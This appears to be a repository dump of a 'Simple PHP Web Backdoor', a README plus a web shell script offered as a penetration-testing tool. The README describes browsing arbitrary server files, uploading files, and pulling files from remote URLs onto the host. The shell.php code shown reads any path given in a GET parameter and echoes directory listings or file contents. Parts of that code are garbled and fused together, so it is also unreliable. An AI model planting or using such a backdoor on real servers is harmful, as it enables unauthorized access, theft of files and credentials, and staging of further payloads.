├── README.md
└── shell.php
/README.md:
--------------------------------------------------------------------------------
1 | # Simple PHP Web Backdoor
2 |
3 |
4 |
5 | A simple PHP web backdoor allows you to retrieve directory/file contents and upload file(s) from the local machine or remote URL.
6 |
7 | It is handy if standard PHP web shells are restricted (e.g. system function disabled and such). I used this when performing penetration testing on security labs and Hack The Box, and it works great!
8 |
9 | ## Features
10 |
11 | ### Retrieve File/Scan Directory
12 |
13 |
14 |
15 | Enter the path you want to explore.
16 |
17 | If it's a directory, it will list all the items in the directory. Otherwise, it will show the content of the file.
18 |
19 | ### Upload File From Your Local
20 |
21 | Upload any file from your local computer. You can upload one or more files.
22 |
23 | The backdoor will save the file in the same working directory.
24 |
25 | ### Upload File From URL
26 |
27 | Upload any file from a remote URL. You need to specify the output file name and the URL of the remote file.
28 |
29 | Make sure the host can access the remote file.
30 |
31 | ## Disclaimer
32 |
33 | This script is only for permitted penetration testing and security research, and I will not be responsible if you use it for illegal activities.
34 |
--------------------------------------------------------------------------------
/shell.php:
--------------------------------------------------------------------------------
1 | Retrieve File/Scan Directory
2 | Current file path:
3 |
8 | Realpath: ' . realpath($_GET['path']) . '29 |
'; 16 | echo 'Type: '; 17 | if (is_dir($path)) { 18 | echo 'Directory
'; 19 | foreach (scandir($path) as $data) { 20 | echo $data . "
"; 21 | } 22 | } else { 23 | echo 'File
'; 24 | print_r(file_get_contents($path)); 25 | } 26 | } 27 | ?> 28 |
59 | 68 |69 | --------------------------------------------------------------------------------